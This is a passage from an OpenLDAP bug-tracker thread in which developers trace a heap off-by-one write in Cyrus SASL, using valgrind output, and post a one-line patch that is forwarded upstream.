>> ==11019==    by 0x266FF3: slap_sasl_log (sasl.c:146)
>> ==11019==    by 0x4B9B4CF: sasl_seterror (seterror.c:260)
>> ==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
>> ==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
>> ==11019==    by 0x21E130: fe_op_bind (bind.c:279)
>> ==11019==    by 0x21DCE1: do_bind (bind.c:205)
>> ==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
>> ==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
>> ==11019==  Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd
>> ==11019==    at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
>> ==11019==    by 0x4B930A4: _buf_alloc (common.c:2186)
>> ==11019==    by 0x4B93299: _sasl_add_string (common.c:196)
>> ==11019==    by 0x4B9B2D4: sasl_seterror (seterror.c:187)
>> ==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
>> ==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
>> ==11019==    by 0x21E130: fe_op_bind (bind.c:279)
>> ==11019==    by 0x21DCE1: do_bind (bind.c:205)
>> ==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
>> ==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
>> ==11019==    by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048)
>> ==11019==    by 0x4DBE668: start_thread (pthread_create.c:479)
>>
>>
>>
>>
>

Comment 4 Howard Chu 2019-11-28 15:16:34 UTC
Stephan Zeisberg wrote:
> Hi Howard —
> 
> Thanks for the quick reply. Will forward the report upstream to Cyrus SASL.

For reference, this fixes the bug:

vielle:/home/software/cyrus-sasl> git diff
diff --git a/lib/common.c b/lib/common.c
index bc3bf1df..9969d6aa 100644
--- a/lib/common.c
+++ b/lib/common.c
@@ -190,7 +190,7 @@ int _sasl_add_string(char **out, size_t *alloclen,

   if (add==NULL) add = "(null)";

-  addlen=strlen(add); /* only compute once */
+  addlen=strlen(add)+1; /* only compute once */
   if (_buf_alloc(out, alloclen, (*outlen)+addlen)!=SASL_OK)
     return SASL_NOMEM;



Git history shows this bug has existed since the code was originally written in
ommit 061698456069833e244d66ce33c8f82c2cd63ce3
Author: Rob Siemborski <rjs3@andrew.cmu.edu>
Date:   Tue Dec 4 01:59:43 2001 +0000


> 
> Best
> 
>     -Stephan
> 
> On 11/28/19 3:54 PM, Howard Chu wrote:
>> Resending with the non-printable chars omitted:
>>
>> Howard Chu wrote:
>>> Thanks, but your trace clearly shows that this is a fault in Cyrus SASL, you should be reporting
>>> this issue to them.
>>>
>>> valgrind confirms it as well:
>>>
>>> 5ddfddde do_bind: dn () SASL mech <garbage>
>>> 5ddfddde ==> sasl_bind: dn="" mech=<garbage>
>>> datalen=0
>>> ==11019== Thread 3:
>>> ==11019== Invalid write of size 1
>>> ==11019==    at 0x4B9B1DB: sasl_seterror (seterror.c:247)
>>> ==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
>>> ==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
>>> ==11019==    by 0x21E130: fe_op_bind (bind.c:279)
>>> ==11019==    by 0x21DCE1: do_bind (bind.c:205)
>>> ==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
>>> ==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
>>> ==11019==    by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048)
>>> ==11019==    by 0x4DBE668: start_thread (pthread_create.c:479)
>>> ==11019==    by 0x4EFA322: clone (clone.S:95)
>>> ==11019==  Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd
>>> ==11019==    at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
>>> ==11019==    by 0x4B930A4: _buf_alloc (common.c:2186)
>>> ==11019==    by 0x4B93299: _sasl_add_string (common.c:196)
>>> ==11019==    by 0x4B9B2D4: sasl_seterror (seterror.c:187)
>>> ==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
>>> ==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
>>> ==11019==    by 0x21E130: fe_op_bind (bind.c:279)
>>> ==11019==    by 0x21DCE1: do_bind (bind.c:205)
>>> ==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
>>> ==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
>>> ==11019==    by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048)
>>> ==11019==    by 0x4DBE668: start_thread (pthread_create.c:479)
>>> ==11019==
>>> ==11019== Invalid read of size 1
>>> ==11019==    at 0x483DF54: strlen (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
>>> ==11019==    by 0x4E53DE4: __vfprintf_internal (vfprintf-internal.c:1688)
>>> ==11019==    by 0x4E67029: __vsnprintf_internal (vsnprintf.c:114)
>>> ==11019==    by 0x3A1FFA: lutil_debug (debug.c:74)
>>> ==11019==    by 0x266FF3: slap_sasl_log (sasl.c:146)
>>> ==11019==    by 0x4B9B4CF: sasl_seterror (seterror.c:260)
>>> ==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
>>> ==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
>>> ==11019==    by 0x21E130: fe_op_bind (bind.c:279)
>>> ==11019==    by 0x21DCE1: do_bind (bind.c:205)
>>> ==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
>>> ==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
>>> ==11019==  Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd
>>> ==11019==    at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
>>> ==11019==    by 0x4B930A4: _buf_alloc (common.c:2186)
>>> ==11019==    by 0x4B93299: _sasl_add_string (common.c:196)
>>> ==11019==    by 0x4B9B2D4: sasl_seterror (seterror.c:187)
>>> ==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
>>> ==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
>>> ==11019==    by 0x21E130: fe_op_bind (bind.c:279)
>>> ==11019==    by 0x21DCE1: do_bind (bind.c:205)
>>> ==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
>>> ==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
>>> ==11019==    by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048)
>>> ==11019==    by 0x4DBE668: start_thread (pthread_create.c:479)
>>>
>>>
>>>
>>>
>>
> 


-- 
  -- Howard Chu
  CTO, Symas Corp.           http://www.symas.com
  Director, Highland Sun     http://highlandsun.com/hyc/
  Chief Architect, OpenLDAP  http://www.openldap.org/project/

Comment 5 stephan@srlabs.de 2019-11-28 15:39:25 UTC
Created an issue upstream [1] and included the valgrind output and proposed patch.

[1] https://github.com/cyrusimap/cyrus-sasl/issues/587

    -Stephan

On 11/28/19 4:16 PM, Howard Chu wrote:
> 5ddfddde do_bind: dn () SASL mech <garbage>
> 5ddfddde ==> sasl_bind: dn="" mech=<garbage>
> datalen=0
> ==11019== Thread 3:
> ==11019== Invalid write of size 1
> ==11019==    at 0x4B9B1DB: sasl_seterror (seterror.c:247)
> ==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
> ==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
> ==11019==    by 0x21E130: fe_op_bind (bind.c:279)
> ==11019==    by 0x21DCE1: do_bind (bind.c:205)
> ==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
> ==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
> ==11019==    by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048)
> ==11019==    by 0x4DBE668: start_thread (pthread_create.c:479)
> ==11019==    by 0x4EFA322: clone (clone.S:95)
> ==11019==  Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd
> ==11019==    at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
> ==11019==    by 0x4B930A4: _buf_alloc (common.c:2186)
> ==11019==    by 0x4B93299: _sasl_add_string (common.c:196)
> ==11019==    by 0x4B9B2D4: sasl_seterror (seterror.c:187)
> ==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
> ==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
> ==11019==    by 0x21E130: fe_op_bind (bind.c:279)
> ==11019==    by 0x21DCE1: do_bind (bind.c:205)
> ==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
> ==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
> ==11019==    by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048)
> ==11019==    by 0x4DBE668: start_thread (pthread_create.c:479)
> ==11019==
> ==11019== Invalid read of size 1
> ==11019==    at 0x483DF54: strlen (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
> ==11019==    by 0x4E53DE4: __vfprintf_internal (vfprintf-internal.c:1688)
> ==11019==    by 0x4E67029: __vsnprintf_internal (vsnprintf.c:114)
> ==11019==    by 0x3A1FFA: lutil_debug (debug.c:74)
> ==11019==    by 0x266FF3: slap_sasl_log (sasl.c:146)
> ==11019==    by 0x4B9B4CF: sasl_seterror (seterror.c:260)
> ==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
> ==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
> ==11019==    by 0x21E130: fe_op_bind (bind.c:279)
> ==11019==    by 0x21DCE1: do_bind (bind.c:205)
> ==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
> ==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
> ==11019==  Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd
> ==11019==    at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
> ==11019==    by 0x4B930A4: _buf_alloc (common.c:2186)
> ==11019==    by 0x4B93299: _sasl_add_string (common.c:196)
> ==11019==    by 0x4B9B2D4: sasl_seterror (seterror.c:187)
> ==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
> ==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
> ==11019==    by 0x21E130: fe_op_bind (bind.c:279)
> ==11019==    by 0x21DCE1: do_bind (bind.c:205)
> ==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
> ==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
> ==11019==    by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048)
> ==11019==    by 0x4DBE668: start_thread (pthread_create.c:479)

Comment 6 Quanah Gibson-Mount 2020-03-14 17:06:49 UTC
not an openldap bug, fixed in cyrus-sasl upstream